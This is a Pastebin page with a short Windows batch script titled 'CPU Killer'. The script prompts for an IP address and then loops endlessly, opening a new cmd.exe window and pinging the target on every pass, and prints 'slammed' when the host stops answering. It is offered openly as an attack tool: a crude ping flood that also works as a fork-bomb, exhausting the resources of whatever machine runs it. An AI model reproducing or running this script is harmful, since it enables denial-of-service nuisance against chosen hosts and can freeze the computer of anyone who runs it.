SpecialEDLunaa

CPU Killer

Nov 18th, 2020
587
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.18 KB | None | 0 0
  1. @echo off
  2. color c
  3. title CPU Killer
  4. :hub
  5. set /p ip=ip
  6. goto ping
  7. :ping
  8. start cmd.exe
  9. ping %ip% -n 1
  10. if ERRORLEVEL 1 goto offline
  11. goto ping
  12. :offline
  13. echo slammed
  14. goto ping
Advertisement
Add Comment
Please, Sign In to add comment